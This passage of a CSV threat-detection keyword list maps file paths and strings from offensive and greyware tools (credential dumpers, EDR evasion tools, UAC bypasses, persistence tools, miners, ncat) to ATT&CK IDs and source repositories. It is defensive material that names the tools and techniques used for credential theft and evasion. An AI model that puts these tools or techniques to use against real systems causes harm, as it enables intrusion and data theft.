Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*\Tor\tor.exe*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,0,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*\Tor\torrc*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,0,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*\TorBrowser*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,0,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*\TrustExec.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*\UACME-*.zip*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*\uberfile.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\unDefender.exe*,offensive_tool_keyword,unDefender,Killing your 
preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,0,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*\unquotedsvcpath.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*\updog-master\*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,0,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*\usbmon.txt*,offensive_tool_keyword,usbmon,USB capture for Linux.,T1052 - T1059 - T1090 - T1105 - T1114 - T1124 - T1497 - T1557,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Sniffing & Spoofing,https://www.kernel.org/doc/Documentation/usb/usbmon.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Users\*\AppData\Local\GoodSync*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\Users\*\AppData\Local\Temp\*.megatools.cache*,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. 
Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,,N/A,,, -*\Users\Public\*.dmp*,greyware_tool_keyword,procdump,Dump files might contain sensitive data and are often created as part of debugging processes or by attackers exfiltrating data. Users\Public should not be used,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Users\Public\*ntds.dit*,greyware_tool_keyword,wmic,this file shouldn't be found in the Users\Public directory. Its presence could be a sign of an ongoing or past attack.,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Users\Public\*ntds.jfm*,greyware_tool_keyword,wmic,Like the ntds.dit file it should not normally be found in this directory.,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Users\Public\nc.exe*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,0,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*\users\public\sam.save*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*\users\public\system.save*,offensive_tool_keyword,undertheradar,scripts that afford the pentester 
AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*\Users\Public\termsrv.dll*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,0,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*\Users_Nochangedpassword.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\uTorrent\*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\utweb.exe*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\UUID_bypass.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*\wce32.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,0,N/A,8,4,N/A,N/A,N/A,N/A -*\wce64.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,0,N/A,8,4,N/A,N/A,N/A,N/A -*\wce-beta.zip*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*\wdextract.cpp*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*\wdextract.sln*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*\wdextract.vcxproj*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*\wdextract32.exe*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*\wdextract64.exe*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*\WdigestOffsets.csv*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*\WfpTokenDup.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*\whatlicense-main\*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*\WheresMyImplant*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*\while_dll_ms*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Windows\Prefetch\PSEXEC*,greyware_tool_keyword,psexec,Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. 
or the execution of malicious payloads.,T1047 - T1105 - T1204,TA0003 - TA0008 - TA0040,N/A,N/A,Lateral movement,https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\Windows\Tasks\Certipy*,offensive_tool_keyword,certsync,Dump NTDS with golden certificates and UnPAC the hash,T1553.002 - T1003.001 - T1145,TA0002 - TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/zblurx/certsync,1,0,N/A,N/A,6,566,65,2023-07-25T15:22:06Z,2023-01-31T15:37:12Z -*\Windows\Tasks\p4yl0ad*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,0,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*\Windows\Temp\creds.db*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,0,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*\windows\temp\ncat.exe -nv *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*\windows\temp\pwned.trx*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*\Windows-Passwords.ps1*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 
- T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*\WindowsShareFinder.cs*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,0,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*\Win-PS2EXE*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,0,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*\WinRing0x64.sys*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*\WiperPoc.cpp*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*\wl_log.txt*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*\wl-lic.exe*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - 
TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*\wl-lic.pdb*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*\wmi_1.dll*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*\wmi_2.dll*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*\WritebleRegistryKeys.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\ws-dirs.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*\ws-files.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*\WSPCoerce.cs*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z 
-*\x44\x8b\x01\x44\x39\x42*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*\x64\Release\indirect.exe *,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*\x8b\x31\x39\x72\x10\x75*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*\xmrig-*-gcc-win64.zip*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*\xmrig.exe*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - 
TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*\xmrig-6.20.0*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*\xmrig-master*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*\XOR_b64_encrypted\*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*\xorencrypt.py*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*\ysoserial\*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*] Eventviewer Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - 
TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*] Extension Hijacking Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*] Found non-ASCII service: *,offensive_tool_keyword,PhantomService,Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools,T1050.005 - T1055.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*] Powershell Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*] Screensaver Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*] Startup Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*] UserInitMprLogonScript Persistence created*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z 
-*_adAclOutput*.csv*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_adAclOutput*.csv*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_adAclOutput*.csv*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_adAclOutput*.csv*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*_adAclOutput*.csv*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD 